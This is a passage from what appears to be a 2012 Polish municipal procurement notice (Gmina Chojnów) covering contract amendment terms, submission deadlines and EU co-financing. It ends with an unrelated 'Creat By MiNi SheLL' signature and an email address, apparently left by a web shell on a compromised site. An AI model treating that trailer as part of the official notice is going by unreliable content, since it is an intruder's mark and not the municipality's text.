d)   zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu umowy. 
       e)  zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych  identyfikacyjnych. 



       f)   zmniejszenie zakresu usług i wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części 
            zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia. 
       g)  zmiana harmonogramu realizacji projektu w przypadku zaistnienia zmian wytycznych, zmian warunków realizacji projektu lub treści dokumentów programowych. 
       h)  w przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem                      o dokonanie zmian w przedmiotowej umowie. 
       i)   w przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Zamawiający zobowiązany jest do niezwłocznego poinformowania na piśmie o tym fakcie Wykonawcy i wystąpienia z wnioskiem         o dokonanie zmian w przedmiotowej umowie. 
        j)  jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę, jako   stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić w formie pisemnej pod rygorem nieważności takiego oświadczenia. 
       k)  Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania Zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina-chojnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Chojnów, ul.Fabryczna 1, 59-225 Chojnów, pokój Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 09:00, miejsce: Urząd Gminy Chojnów, ul.Fabryczna 1, 59-225 Chojnów, pokój Nr 103(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 70.Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziale 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnić w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com